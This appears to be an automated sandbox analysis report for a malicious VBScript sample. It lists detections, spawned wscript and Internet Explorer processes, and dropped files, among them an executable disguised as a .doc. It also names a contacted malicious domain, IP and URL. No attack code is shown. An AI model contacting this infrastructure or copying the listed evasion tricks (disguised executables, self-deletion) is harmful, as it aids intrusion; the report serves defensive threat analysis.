behaviorgraph top1 signatures2 2 Behavior Graph ID: 323315 Sample: JFCp0yRoUS1z.vbs Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 21 Multi AV Scanner detection for domain / URL 2->21 23 Antivirus detection for dropped file 2->23 25 Multi AV Scanner detection for submitted file 2->25 27 3 other signatures 2->27 6 wscript.exe 2 10 2->6         started        10 iexplore.exe 2 83 2->10         started        process3 file4 15 C:\Users\user\AppData\Local\Temp\Sikkim.doc, PE32 6->15 dropped 17 C:\Users\user\AppData\Local\Temp\shirt.zip, Zip 6->17 dropped 29 Benign windows process drops PE files 6->29 31 VBScript performs obfuscated calls to suspicious functions 6->31 33 Deletes itself after installation 6->33 35 2 other signatures 6->35 12 iexplore.exe 31 10->12         started        signatures5 process6 dnsIp7 19 api10.laptok.at 47.241.19.44, 49742, 49743, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 12->19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
47.241.19.44
unknown United States
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC true

Contacted Domains

Name IP Active
api10.laptok.at 47.241.19.44 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://api10.laptok.at/favicon.ico true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown